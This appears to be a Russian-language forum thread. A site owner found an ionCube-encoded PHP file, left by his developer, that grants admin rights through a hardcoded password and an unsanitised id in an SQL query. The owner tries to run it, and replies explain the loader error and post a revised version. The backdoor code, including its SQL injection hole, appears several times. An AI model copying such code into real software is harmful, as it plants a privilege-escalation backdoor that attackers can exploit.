Как запустить закодированный файл?

saymong

Мой дом здесь!
Регистрация
29 Сен 2010
Сообщения
610
Реакции
430
Здравствуйте.
Вот такая проблема, на сайте есть закодированный файл (IonCube). После его раскодировки понял, что вечные проблемы с сайтом были из-за того, что тот кто писал сайт, положил туда такой код

<?php
include '../config.php';

if (isset($_GET['pass']) && ($_GET['pass'] == '123456')) {
$user = mysql_query('UPDATE `users` SET `admin` = \'1\' WHERE `uid` = \'' . $_GET['id'] . '\'');
return 1;
}

echo '<script>document.location.href=\'../index.php\'</script>';
exit();
?>

и мог любого пользователя сделать админом. Но при попытке запустить его, у меня выходит ошибка
PHP:
Site error: the file /home/username/public_html/admininstrator/version.php requires the ionCube PHP Loader ioncube_loader_lin_5.3.so to be installed by the website operator. If you are the website operator please use the ionCube Loader Wizard to assist with installation.

Как же тогда его запускал тот, кто реально пару раз ставил мне пользователей админами.
Я ввожу в адресную строку такой URL

Для просмотра ссылки Войди или Зарегистрируйся

По идее пользователь с ID 1212 должен стать админом... Верно ли я все делаю?
 
верно, в принципе файл
/home/username/public_html/admininstrator/version.php
не нужен, если то, что у вас спойлере это весь ваш код. можете также напрямую выполнить запрос в базу (параметры соединения берутся с config.php)

UPDATE `users` SET `admin` = 1 WHERE uid = 1212
а сам файл version.php выкинуть вообще, либо заменить его раскодированой версией. хотя это верная дыра
 
верно, в принципе файл
не нужен, если то, что у вас спойлере это весь ваш код. можете также напрямую выполнит запрос в базу


а сам файл version.php выкинуть вообще, либо заменить его раскодированой версией. хотя это верная дыра
Если Вам не трудно, напишите (просто для проверки) код мне в ЛС чтоюы проверить. Просто сайт так стоял почти 3 месяца. Только руки до него дошли и тут такое.
И что за ошибка выходит?
 
Если Вам не трудно, напишите (просто для проверки) код мне в ЛС чтоюы проверить. Просто сайт так стоял почти 3 месяца. Только руки до него дошли и тут такое.
И что за ошибка выходит?
ошибка про то, что файл закодирован ионкубом и для его корректной загрузки и отработки на сервере нужно установить расширение (ионкуб лоадер).
 
Я уже понял это, Перевел ошибку)))
А как именно запустить
PHP:
UPDATE `users` SET `admin` = 1 WHERE uid = 1212
Как его выполнить?
 
Странно, установил IonCube теперь ввожу
Для просмотра ссылки Войди или Зарегистрируйся
Страница стает белой и все на этом....
Пользователь 1212 так и не стает админом. Либо файл глючит, либо я...
Помогите понять что делаю не так...
 
Я уже понял это, Перевел ошибку)))
А как именно запустить
PHP:
UPDATE `users` SET `admin` = 1 WHERE uid = 1212
Как его выполнить?
это можно сделать в phpmyadmin, если он у вас есть на сервере

Странно, установил IonCube теперь ввожу
Для просмотра ссылки Войди или Зарегистрируйся
Страница стает белой и все на этом....
Пользователь 1212 так и не стает админом. Либо файл глючит, либо я...
Помогите понять что делаю не так...
должно по идее, если там код соответствует структуре базы
 
Ну через phpmyadmin - это понятно. А вот как делал это прогер (который писал скрипт) и который уже менял пользователей...

Ладно, буду разбираться дальше.
Спасибо всем за помощь.
Тему можно закрыть.
 
Ну через phpmyadmin - это понятно. А вот как делал это прогер (который писал скрипт) и который уже менял пользователей...

Ладно, буду разбираться дальше.
Спасибо всем за помощь.
Тему можно закрыть.
попробуйте заменить файл на
<?php
include '../config.php';

if (isset($_GET['pass']) && ($_GET['pass'] == '123456')) {
$user = mysql_query('UPDATE `users` SET `admin` = \'1\' WHERE `uid` = \'' . $_GET['id'] . '\'');
echo 'Пользователь #'.$_GET['pass'].' теперь админ';
}

die();
?>
 
Я понял причину. в коде либо сам автор напутал либо так задуманно. В общем через phpmyadmin получается сменить пользователя.
но в коде путаница
<?php
include '../config.php';

if (isset($_GET['pass']) && ($_GET['pass'] == '123456')) {
$user = mysql_query('UPDATE `users` SET `admin` = \'1\' WHERE `uid` = \'' . $_GET['id'] . '\'');
return 1;
}

echo '<script>document.location.href=\'../index.php\'</script>';
exit();
?>
UID - нет такого поля/таблицы в БД.

Заменил файл, ничего...также белая страница...
 
Назад
Сверху